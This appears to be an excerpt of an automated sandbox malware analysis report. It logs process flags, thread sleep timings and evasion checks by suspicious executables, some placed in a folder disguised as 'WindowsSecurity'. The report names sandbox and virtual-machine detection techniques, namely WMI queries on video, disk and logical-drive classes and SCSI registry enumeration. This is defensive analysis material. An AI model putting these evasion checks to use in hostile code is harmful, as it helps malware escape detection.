Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 5zQ4dC4.exe, 0000000A.00000002.1747396638.00000000004E4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\8427.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\932079.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 4504	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3668	Thread sleep count: 3120 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3668	Thread sleep count: 2124 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5788	Thread sleep time: -407700s >= -30000s
Source: C:\Windows\explorer.exe TID: 7100	Thread sleep time: -184100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe TID: 6044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe TID: 3128	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe TID: 2596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597858s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597739s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597615s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596572s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596467s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -596130s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595853s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595712s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595384s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -595029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594914s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -594094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -593952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -593734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -593620s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8427.exe TID: 6860	Thread sleep time: -593516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8F82.exe TID: 3052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9AED.exe TID: 6912	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9AED.exe TID: 6912	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9AED.exe TID: 5376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\9AED.exe TID: 1508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599653s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598860s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597939s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597800s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597657s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597530s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597417s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597299s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe TID: 3288	Thread sleep time: -597063s >= -30000s
